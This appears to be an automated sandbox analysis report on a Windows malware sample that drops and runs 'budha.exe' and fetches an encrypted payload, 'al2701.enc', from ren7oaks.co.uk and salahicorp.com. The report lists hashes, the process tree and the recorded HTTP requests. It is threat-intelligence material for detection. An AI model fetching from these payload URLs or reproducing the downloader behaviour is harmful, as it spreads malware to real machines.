
Resubmissions

07/01/2024, 18:26 UTC

240107-w3ameabffn 10

Analysis

  • max time kernel
    1s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/01/2024, 18:26 UTC

General

  • Target

    Samples 6/c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca.exe

  • Size

    7KB

  • MD5

    9612c12e7c958af8eddf9ebf341ad754

  • SHA1

    39a96f9934706cc22a34a9398dc1dd4e7d03d738

  • SHA256

    c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca

  • SHA512

    d13a58955741eaa148b7fd55ad690e7f4c9fa53beb06dbc4a6b5ef527bfb23ef9999e2ea5c0ed93ddc519e410f6f6f6ea16cad9702eaa21e08e2bc69bcbf9c22

  • SSDEEP

    192:HpEwzsViovM7q1YpmYiogbJgigbGgJgigoD9NwEt:HpEwIIj7+YptYPv8PVH

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Samples 6\c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca.exe (PID 2208, depth 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Samples 6\c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca.exe"
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\budha.exe (PID 2352, depth 2, child of PID 2208)
      Command line: "C:\Users\Admin\AppData\Local\Temp\budha.exe"
      • Executes dropped EXE

Network

  • DNS [US] ren7oaks.co.uk
    Remote address: 8.8.8.8:53
    Request: ren7oaks.co.uk IN A
    Response: ren7oaks.co.uk IN A 185.151.30.204
  • GET [GB] http://ren7oaks.co.uk/images/al2701.enc
    Remote address: 185.151.30.204:80
    Request:
    GET /images/al2701.enc HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: ren7oaks.co.uk
    Cache-Control: no-cache
    Response:
    HTTP/1.1 301
    content-length: 0
    location: https://ren7oaks.co.uk/images/al2701.enc
    x-via: LHR3
  • DNS [US] salahicorp.com
    Remote address: 8.8.8.8:53
    Request: salahicorp.com IN A
    Response: salahicorp.com IN A 34.168.225.46
  • DNS [US] salahicorp.com
    Remote address: 8.8.8.8:53
    Request: salahicorp.com IN A
    Response: (empty)
  • DNS [US] salahicorp.com
    Remote address: 8.8.8.8:53
    Request: salahicorp.com IN A
  • GET [US] http://salahicorp.com/up/al2701.enc
    Remote address: 34.168.225.46:80
    Request:
    GET /up/al2701.enc HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: salahicorp.com
    Cache-Control: no-cache
    Response:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 07 Jan 2024 18:34:00 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=175b3e5a7a9b57864135291034215add|89.149.23.59|1704652440|1704652440|0|1|0; path=/; domain=.salahicorp.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=89.149.23.59; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • 185.151.30.204:80 | http://ren7oaks.co.uk/images/al2701.enc | http | 513 B / 309 B | 8 / 5 pkts
    HTTP Request: GET http://ren7oaks.co.uk/images/al2701.enc
    HTTP Response: 301
  • 185.151.30.204:443 | ren7oaks.co.uk | tls | 395 B / 175 B | 5 / 4 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | tls | 449 B / 222 B | 7 / 5 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | tls | 388 B / 171 B | 7 / 4 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | (no protocol recorded) | 190 B / 88 B | 4 / 2 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | tls | 395 B / 175 B | 5 / 4 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | tls | 570 B / 175 B | 7 / 4 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | tls | 340 B / 175 B | 6 / 4 pkts
  • 185.151.30.204:443 | ren7oaks.co.uk | (no protocol recorded) | 190 B / 88 B | 4 / 2 pkts
  • 34.168.225.46:80 | http://salahicorp.com/up/al2701.enc | http | 733 B / 498 B | 7 / 2 pkts
    HTTP Request: GET http://salahicorp.com/up/al2701.enc
    HTTP Response: 200
  • 8.8.8.8:53 | ren7oaks.co.uk | dns | 60 B / 76 B | 1 / 1 pkts
    DNS Request: ren7oaks.co.uk
    DNS Response: 185.151.30.204
  • 8.8.8.8:53 | salahicorp.com | dns | 180 B / 136 B | 3 / 2 pkts
    DNS Request: salahicorp.com
    DNS Request: salahicorp.com
    DNS Request: salahicorp.com
    DNS Response: 34.168.225.46

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\budha.exe

    Filesize

    7KB

    MD5

    98bc96fd2508f93e40ba3a8c8e40d199

    SHA1

    4912ecd1e774f8c1b7aa2bdaa94ef477f01f8c12

    SHA256

    b2e779a05b06840f138cfc0c2145df5158818affcf10e595380ff2ce364bcefb

    SHA512

    f0abe8d07c097c13767b35c36cdab1ea7247f85c6ca1fbd17672adf92409ac45c93478c614a5679193d8ed09cc366e36343ca45cd6968bcce5cb500162b24856

  • memory/2208-0-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/2208-10-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/2208-12-0x0000000001F50000-0x0000000001F59000-memory.dmp

    Filesize

    36KB

  • memory/2208-17-0x0000000001F50000-0x0000000001F59000-memory.dmp

    Filesize

    36KB

  • memory/2352-13-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB
